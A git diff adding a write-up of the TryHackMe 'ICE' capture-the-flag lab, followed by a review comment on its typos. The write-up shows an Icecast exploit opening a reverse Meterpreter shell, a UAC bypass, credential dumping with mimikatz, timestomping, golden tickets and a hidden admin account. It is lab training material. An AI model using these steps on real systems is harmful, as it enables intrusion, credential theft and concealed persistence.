diff --git a/TryHackMe/ICE.md b/TryHackMe/ICE.md new file mode 100644 index 0000000..2d987e5 --- /dev/null +++ b/TryHackMe/ICE.md 
@@ -0,0 +1,472 @@ +# TryHackMe-ICE CTF + +> Abdullah Rizwan | 09 September ,09 : 05 PM + +## NMAP + +``` +export IP=10.10.215.129 + +``` + +It is a good practice to scan all ports so we are going to use this syntax +``` +nmap -T4 -A -p- $IP + +``` + + +``` +Host is up (0.17s latency). +Not shown: 65523 closed ports +PORT STATE SERVICE VERSION +135/tcp open msrpc Microsoft Windows RPC +139/tcp open netbios-ssn Microsoft Windows netbios-ssn +445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP) +3389/tcp open ssl/ms-wbt-server? +|_ssl-date: 2020-09-09T16:59:43+00:00; -8h59m59s from scanner time. +5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) +|_http-server-header: Microsoft-HTTPAPI/2.0 +|_http-title: Service Unavailable +8000/tcp open http Icecast streaming media server +|_http-title: Site doesn't have a title (text/html). +49152/tcp open msrpc Microsoft Windows RPC +49153/tcp open msrpc Microsoft Windows RPC +49154/tcp open msrpc Microsoft Windows RPC +49158/tcp open msrpc Microsoft Windows RPC +49159/tcp open msrpc Microsoft Windows RPC +49161/tcp open msrpc Microsoft Windows RPC +No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
+TCP/IP fingerprint: +OS:SCAN(V=7.80%E=4%D=9/9%OT=135%CT=1%CU=32788%PV=Y%DS=2%DC=T%G=Y%TM=5F5988C +OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=104%TI=I%CI=I%II=I%SS=S%TS= +OS:7)OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M5 +OS:08NW8ST11%O6=M508ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200 +OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S +OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y% +OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD= +OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0% +OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1( +OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI= +OS:N%T=80%CD=Z) + +Network Distance: 2 hops + +Host script results: +|_clock-skew: mean: -7h44m58s, deviation: 2h30m00s, median: -8h59m59s +|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: , NetBIOS MAC: 02:a7:8e:88:a9:05 (unknown) +| smb-os-discovery: +| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1) +| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional +| Computer name: Dark-PC +| NetBIOS computer name: DARK-PC\x00 +| Workgroup: WORKGROUP\x00 +|_ System time: 2020-09-09T11:59:35-05:00 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2020-09-09T16:59:35 +|_ start_date: 2020-09-09T16:11:28 + +TRACEROUTE (using port 199/tcp) +HOP RTT ADDRESS +1 177.21 ms 10.8.0.1 +2 180.01 ms 10.10.215.129 + +OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
+Nmap done: 1 IP address (1 host up) scanned in 931.07 seconds + + +``` + +## Metaslpoit + +Now we can look for `icecast` in msfconsole and there is a vulnerability for icecast + +https://www.cvedetails.com/cve/CVE-2004-1561/ + +``` + search icecast + +Matching Modules +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite + +``` + + +Use this exploit and change settings according to your `tun0` and `machine_ip`. +``` +Module options (exploit/windows/http/icecast_header): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + RHOSTS 10.10.215.129 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:' + RPORT 8000 yes The target port (TCP) + + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 10.8.94.60 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + + +``` + + +``` +exploit + +[*] Started reverse TCP handler on 10.8.94.60:4444 +[*] Sending stage (176195 bytes) to 10.10.215.129 +[*] Meterpreter session 1 opened (10.8.94.60:4444 -> 10.10.215.129:49264) at 2020-09-09 22:18:29 -0400 + +meterpreter > + + +``` + +``` +getuid +Server username: Dark-PC\Dark +meterpreter > sysinfo +Computer : DARK-PC +OS : Windows 7 (6.1 Build 7601, Service Pack 1). 
+Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 2 +Meterpreter : x86/windows + +``` +## Privilege Escalation + +Since we are not the administrator of this box we can run build module to look for privilege escalation + +``` +meterpreter > run post/multi/recon/local_exploit_suggester + +[*] 10.10.215.129 - Collecting local exploits for x86/windows... +[*] 10.10.215.129 - 34 exploit checks are being tried... +[+] 10.10.215.129 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable. +nil versions are discouraged and will be deprecated in Rubygems 4 +[+] 10.10.215.129 - exploit/windows/local/ikeext_service: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable. +[+] 10.10.215.129 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable. +meterpreter > + + +``` + +Now selecting the first exploit found we are going to background `ctrl+z` our session. +``` +msf5 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr +[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp +msf5 exploit(windows/local/bypassuac_eventvwr) > show options + +Module options (exploit/windows/local/bypassuac_eventvwr): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + SESSION yes The session to run this module on. 
+ + +Payload options (windows/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) + LHOST 192.168.1.6 yes The listen address (an interface may be specified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Windows x86 + + +msf5 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1 +SESSION => 1 +msf5 exploit(windows/local/bypassuac_eventvwr) > set LHOST 10.8.94.60 +LHOST => 10.8.94.60 +msf5 exploit(windows/local/bypassuac_eventvwr) > + + +``` + +When we run this exploit we will have another session created + +``` +exploit + +[*] Started reverse TCP handler on 10.8.94.60:4444 +[*] UAC is Enabled, checking level... +[+] Part of Administrators group! Continuing... +[+] UAC is set to Default +[+] BypassUAC can bypass this setting, continuing... +[*] Configuring payload and stager registry keys ... +[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe +[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute. 
+[*] Sending stage (176195 bytes) to 10.10.215.129 +[*] Meterpreter session 2 opened (10.8.94.60:4444 -> 10.10.215.129:49278) at 2020-09-09 22:30:01 -0400 +``` + +Now we have to see which process is running as `authoritiy` + + +``` + PID PPID Name Arch Session User Path [48/1936] + --- ---- ---- ---- ------- ---- ---- + 0 0 [System Process] + 4 0 System x64 0 + 384 3124 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe + 416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe + 500 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe + 552 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 592 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe + 604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe + 652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe + 692 592 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe + 700 592 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe + 708 592 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe + 812 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe + 816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe + 884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1060 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1188 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe + 1296 500 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe + 1316 1288 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe + 1392 692 
spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe + 1420 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1476 692 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhost.exe + 1596 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe + 1668 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe + 1708 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe + 1900 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe + 1984 1316 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe + 2132 816 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.exe + 2244 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe + 2268 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe + 2512 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe + 2572 1984 cmd.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\cmd.exe + 2676 816 rundll32.exe x64 1 Dark-PC\Dark C:\Windows\System32\rundll32.exe + 2724 2676 dinotify.exe x64 1 Dark-PC\Dark C:\Windows\System32\dinotify.exe + 3680 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe + 3728 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost.exe + + +``` + + +Here `spoolsv.exe` is ruuning as authority and we can take advantage of that by `migrating` into that process. + + + +``` +migrate -N spoolsv.exe +[*] Migrating from 384 to 1392... +[*] Migration completed successfully. +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM +meterpreter > + +``` + + + +## Kiwi + +``` +meterpreter > load kiwi +Loading extension kiwi... + .#####. mimikatz 2.2.0 20191125 (x64/windows) + .## ^ ##. 
"A La Vie, A L'Amour" - (oe.eo) + ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) + ## \ / ## > http://blog.gentilkiwi.com/mimikatz + '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) + '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ + +Success. + + +Kiwi Commands +============= + + Command Description + ------- ----------- + creds_all Retrieve all credentials (parsed) + creds_kerberos Retrieve Kerberos creds (parsed) + creds_msv Retrieve LM/NTLM creds (parsed) + creds_ssp Retrieve SSP creds + creds_tspkg Retrieve TsPkg creds (parsed) + creds_wdigest Retrieve WDigest creds (parsed) + dcsync Retrieve user account information via DCSync (unparsed) + dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync + golden_ticket_create Create a golden kerberos ticket + kerberos_ticket_list List all kerberos tickets (unparsed) + kerberos_ticket_purge Purge any in-use kerberos tickets + kerberos_ticket_use Use a kerberos ticket + kiwi_cmd Execute an arbitary mimikatz command (unparsed) + lsa_dump_sam Dump LSA SAM (unparsed) + lsa_dump_secrets Dump LSA secrets (unparsed) + password_change Change the password/hash of a user + wifi_list List wifi profiles/creds for the current user + wifi_list_shared List shared wifi profiles/creds (requires SYSTEM) + + +``` + +Now using `creds_all` to retreive the password in parsed form + +``` +eterpreter > creds_all +[+] Running as SYSTEM +[*] Retrieving all credentials +msv credentials +=============== + +Username Domain LM NTLM SHA1 +-------- ------ -- ---- ---- +Dark Dark-PC e52cac67419a9a22ecb08369099ed302 7c4fe5eada682714a036e39378362bab 0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb + +wdigest credentials +=================== + +Username Domain Password +-------- ------ -------- +(null) (null) (null) +DARK-PC$ WORKGROUP (null) +Dark Dark-PC Password01! + +tspkg credentials +================= + +Username Domain Password +-------- ------ -------- +Dark Dark-PC Password01! 
+ +kerberos credentials +==================== + +Username Domain Password +-------- ------ -------- +(null) (null) (null) +Dark Dark-PC Password01! +dark-pc$ WORKGROUP (null) + +``` + + + +While more useful when interacting with a machine being used, what command allows us to watch the remote user's desktop in real time? + +``` +screenshare +``` + +How about if we wanted to record from a microphone attached to the system? + +``` +record mic +``` + + +To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this? Don't ever do this on a pentest unless you're explicitly allowed to do so! This is not beneficial to the defending team as they try to breakdown the events of the pentest after the fact. + +``` +timestomp +``` + + + +Mimikatz allows us to create what's called a `golden ticket`, allowing us to authenticate anywhere with ease. What command allows us to do this? + +Golden ticket attacks are a function within Mimikatz which abuses a component to Kerberos (the authentication system in Windows domains), the ticket-granting ticket. In short, golden ticket attacks allow us to maintain persistence and authenticate as any user on the domain. + + +``` +golden_ticket_create +``` +# Extra + +## RDP + +If you want to remotely connect to the box and use it's GUI you can do that by checking if `rdp` is enabled on that box + + +``` +meterpreter > run post/windows/manage/enable_rdp + +[*] Enabling Remote Desktop +[*] RDP is already enabled +[*] Setting Terminal Services service startup mode +[*] The Terminal Services service is not set to auto, changing it to auto ... +[*] Opening port in local firewall if necessary +[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200909230409_default_10.10.215.129_host.windows.cle_189827.txt + +``` + +If you want you can add a new user as long as your `Authority` + +``` +terpreter > run getgui -u arz -p Password01! + +[!] Meterpreter scripts are deprecated. 
Try post/windows/manage/enable_rdp. +[!] Example: run post/windows/manage/enable_rdp OPTION=value [...] +[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator +[*] Carlos Perez carlos_perez@darkoperator.com +[*] Setting user account for logon +[*] Adding User: arz with Password: Password01! +[*] Hiding user from Windows Login screen +[*] Adding User: arz to local group 'Remote Desktop Users' +[*] Adding User: arz to local group 'Administrators' +[*] You can now login with the created user +[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20200909.1126.rc + +``` +Since `Dark` is logged in for now this would mess up the box if we try to login with a new user. + +``` +root@kali:~# rdesktop -u dark -p Password01! 10.10.215.129 +Autoselecting keyboard map 'en-us' from locale +Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. +Failed to initialize NLA, do you have correct Kerberos TGT initialized ? +Core(warning): Certificate received from server is NOT trusted by this system, an exception has been added by the user to trust this specific certificate. +Connection established using SSL. +Protocol(warning): process_pdu_logon(), Unhandled login infotype 1 +Clipboard(error): xclip_handle_SelectionNotify(), unable to find a textual target to satisfy RDP clipboard text request + +``` + + + \ No newline at end of file
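Review bot: the new ICE.md carries several spelling slips and one missing command that readers will trip over. The heading `## Metaslpoit` should be `## Metasploit`; `we can run build module` should read `we can run the built-in module`; `ruuning` should be `running`, `retreive` should be `retrieve`, `use it's GUI` should be `use its GUI`, and `as long as your \`Authority\`` should be `as long as you're \`Authority\``. The process table under "Now we have to see which process is running as `authoritiy`" is pasted without the `ps` command that produced it, and its header line still contains terminal residue (`[48/1936]`); the prompts `eterpreter > creds_all` and `terpreter > run getgui` are likewise truncated copies of `meterpreter >`. The sentence "Now selecting the first exploit found we are going to background `ctrl+z` our session" also states the steps in reverse order: the session is backgrounded first, then `use exploit/windows/local/bypassuac_eventvwr` is issued. Consider tagging the fenced blocks with a language (`bash` for commands, `text` for pasted output) so the listings render consistently.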